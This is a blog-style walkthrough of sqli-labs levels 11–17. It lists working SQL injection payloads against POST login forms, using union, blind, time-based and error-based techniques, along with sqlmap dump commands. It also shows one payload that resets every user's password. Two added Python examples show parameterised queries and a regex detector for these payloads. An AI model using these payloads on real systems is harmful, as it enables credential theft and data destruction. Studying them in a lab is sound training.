
Sqli-libs post injection question 11-17 actual combat

2022-06-11 05:57:00 MajorTom0

Catalog

Less-11

Less-12

Less-13

Less-14

Less-15

Less-16

Less-17


Less-11

       POST single-quote (') injection

       Determine the displayed columns

uname=&passwd=' union select 1,2 -- -   (confirms that columns 1 and 2 are displayed)

       Database name and database user

uname=&passwd=' union select user(),database()-- -   (returns the current user [email protected] and the database name security)

       Table names

uname=&passwd=' union select 1,group_concat(table_name) from information_schema.tables where table_schema="security" -- -   (returns the table names emails,referers,uagents,users)

       Column names of the users table

uname=&passwd=' union select 1,group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security"-- -   (returns the column names id,username,password)

       Dump the columns

uname=&passwd=' union select group_concat(username),group_concat(password) from users -- -   (returns the accounts and passwords)
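To show the fix this level is teaching, here is an added example (not from the original post or from sqli-labs) that uses Python's sqlite3 as a stand-in for the lab's PHP/MySQL login form: the string-built query is subverted by the Less-11 union payloads above, while the same query with bound parameters is not. The table rows, `make_db`, `login_vulnerable` and `login_safe` are all constructed for this example.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the lab's security.users table (sample rows, not the lab's data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return con

def login_vulnerable(con, uname, passwd):
    """Query built by string concatenation, like the lab's Less-11 form:
    a quote in the input closes the string literal and the rest is parsed as SQL."""
    sql = ("SELECT username, password FROM users "
           f"WHERE username='{uname}' AND password='{passwd}'")
    return con.execute(sql).fetchall()

def login_safe(con, uname, passwd):
    """Same query with bound parameters: the inputs reach the engine as data,
    so quotes, UNION and comment sequences in them are never parsed as SQL."""
    sql = "SELECT username, password FROM users WHERE username=? AND password=?"
    return con.execute(sql, (uname, passwd)).fetchall()

if __name__ == "__main__":
    con = make_db()
    dump = "' union select group_concat(username),group_concat(password) from users -- -"
    print("concatenated: ", login_vulnerable(con, "", dump))   # leaks every row
    print("parameterised:", login_safe(con, "", dump))         # []
```

SQLite has no sleep() or updatexml(), so only the union-based payloads of Less-11 and Less-12 translate directly to this stand-in; the parameterised form defends against the blind and error-based variants in the same way.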

Less-12

       POST double quote plus ) injection check

uname=&passwd=" and 1=1 -- -   (error)

uname=&passwd=") and 1=1 -- -   (normal)

       Determine the displayed columns

uname=&passwd=") union select 1,2  -- -

       The remaining steps follow the same reasoning as Less-1.

Less-13

       Single quote plus ) error-based blind injection

uname=admin&passwd=admin') order by 2-- -   (the query returns 2 columns)

       Determine the length of the database name

uname=admin&passwd=admin') and length(database())>8 -- -   (error)

uname=admin&passwd=admin') and length(database())>7 -- -   (normal; the database name is 8 characters long)

       Determine the ASCII value of the first character of the database name

uname=admin&passwd=admin') and ascii(left(database(),1))>114 -- -   (normal)

uname=admin&passwd=admin') and ascii(left(database(),1))>115 -- -   (error; so the first letter is s)

       Determine the second letter of the database name

uname=admin&passwd=admin') and ascii(substr(database(),2,1))>101 -- -   (error)

uname=admin&passwd=admin') and ascii(substr(database(),2,1))>100 -- -   (normal; so the second letter is e)

       Continuing in this way gives the database name security

       Determine the number of tables

uname=admin&passwd=admin') and (select count(table_name) from information_schema.tables where table_schema="security")=4 -- -   (there are 4 tables)

       Determine the first letter of the first table name

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))>100 -- -   (normal)

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))>101 -- -   (error; the first letter is e)

       Determine the second letter of the first table name

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),2,1))>108 -- -   (normal)

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),2,1))>109 -- -   (error; the second letter is m)

       Determine the first letter of the fourth table name

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),1,1))>116 -- -   (normal)

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),1,1))>117 -- -   (error; the first letter is u)

       Determine how many columns the users table has

uname=admin&passwd=admin') and (select count(column_name) from information_schema.columns where table_schema="security" and table_name="users" )=3 -- -   (there are 3 columns)

       Determine the first letter of the first column name

uname=admin&passwd=admin') and ascii(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),1,1))>104 -- -   (normal)

uname=admin&passwd=admin') and ascii(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),1,1))>105 -- -   (error; the first letter is i)

       This yields the columns id,username,password

       Determine the first letter of the first value in the username column

uname=admin&passwd=admin') and ascii(substr((select username from users limit 0,1),1,1))>67 -- -   (normal)

uname=admin&passwd=admin') and ascii(substr((select username from users limit 0,1),1,1))>68 -- -   (error; so the first letter is D)

       Determine the password of the user Dumb

uname=admin&passwd=admin') and ascii(substr((select password from users where username="dumb"),1,1))>68 -- -   (error)

uname=admin&passwd=admin') and ascii(substr((select password from users where username="dumb"),1,1))>67 -- -   (normal; so the first letter is D)

       By this point every account and password can be recovered the same way; the rest is better done with a script.

       Capture the POST request body, save it as 123.txt, and run sqlmap against it:

sqlmap -r 123.txt --dump -T users -D security

Less-14

       Similar to Less-13: save the POST request headers and body to a text file and run sqlmap against it:

sqlmap -r 123.txt --dump -T users -D security --level 5 --risk 3

Less-15

       Single quote blind injection check

uname=admin&passwd=admin' -- -   (normal)

uname=admin&passwd=admin" -- -   (abnormal)

       Determine the length of the database name

uname=admin&passwd=admin' and length(database())>8 and sleep(3)-- -   (no delay)

uname=admin&passwd=admin' and length(database())>7 and sleep(3)-- -   (3-second delay; the name is 8 characters long)

       Determine the first character of the database name

uname=admin&passwd=admin' and ascii(substr((database()),1,1))=115 and sleep(3)-- -   (the first letter is s)

       The remaining steps are the same as in Less-13.

       The result can also be obtained by running sqlmap.

Less-16

       Double quote plus ) check

uname=admin&passwd=admin") and sleep(3) -- -   (sleeps 3 seconds)

       The remaining steps are the same as in Less-15; likewise save the POST data to a text file and run sqlmap against it:

sqlmap -r 123.txt --dump -T users -D security --level 5

Less-17

       Single quote injection in an UPDATE statement

uname=admin&passwd=admin' where 1=1 and sleep(2) -- -   (sleeps 2 seconds; note that this statement sets every user's password to admin)

       Time-based injection

uname=admin&passwd=123' and length(database())=8 and sleep(2) -- -   (delays 26 seconds, because the table holds 13 rows and sleep(2) runs once for each of them)

       The remaining steps would be the same as above, but because the time-based payloads run inside the UPDATE and overwrite the data, switch to error-based injection instead:

uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- -   (returns the database name security)

       Query the table names

uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"),0x7e),1) -- -   (returns the table names)

       Query the column names

uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security"),0x7e),1) -- -   (returns the column names)

       Query data from other tables

uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(email_id) from security.emails),0x7e),1) -- -
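On the detection side, here is an added example (not part of the original post) that classifies POST bodies by the payload families used across Less-11 to Less-17 (union, boolean, time-based, error-based, information_schema lookups). The sample bodies, the regexes and the function names are constructed for this example; the alert rule only fires when a SQL function co-occurs with a quote or comment marker, so a password that merely contains a function name is not flagged.

```python
import re
from urllib.parse import parse_qs

# Signatures for the payload families used in the Less-11..17 walkthrough (case-insensitive).
FAMILIES = {
    "union":   re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "boolean": re.compile(r"\b(ascii|length|substr|left)\s*\(", re.I),
    "time":    re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "error":   re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "schema":  re.compile(r"\binformation_schema\.", re.I),
}
COMMENT = re.compile(r"--\s|#|/\*")   # MySQL comment openers used to discard the rest of the query
QUOTE = re.compile(r"['\"]")          # characters that break out of a quoted string literal

def _values(body):
    """All form values of a url-encoded body, blank values included."""
    return [v for vs in parse_qs(body, keep_blank_values=True).values() for v in vs]

def classify_body(body):
    """Return the set of payload families found in the values of a form body."""
    found = set()
    for v in _values(body):
        found.update(name for name, pat in FAMILIES.items() if pat.search(v))
        if COMMENT.search(v):
            found.add("comment")
    return found

def is_suspicious(body):
    """Alert only when a SQL family co-occurs with a quote or comment marker."""
    fams = classify_body(body)
    breakout = "comment" in fams or any(QUOTE.search(v) for v in _values(body))
    return bool(fams & set(FAMILIES)) and breakout

# Constructed sample POST bodies (already url-decoded), not captured traffic.
SAMPLE_BODIES = [
    "uname=&passwd=' union select 1,2 -- -",
    "uname=admin&passwd=admin') and ascii(substr(database(),2,1))>100 -- -",
    "uname=admin&passwd=admin' and length(database())>8 and sleep(3)-- -",
    "uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- -",
    "uname=Dumb&passwd=Dumb",
    "uname=sleeper&passwd=sleep(8)",   # function name without a breakout: not an alert
]

if __name__ == "__main__":
    for b in SAMPLE_BODIES:
        print("ALERT" if is_suspicious(b) else "ok   ", sorted(classify_body(b)), b)
```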


Copyright notice
This article was written by MajorTom0; please include the original link when reposting. Thank you.
https://yzsam.com/2022/03/202203020532300457.html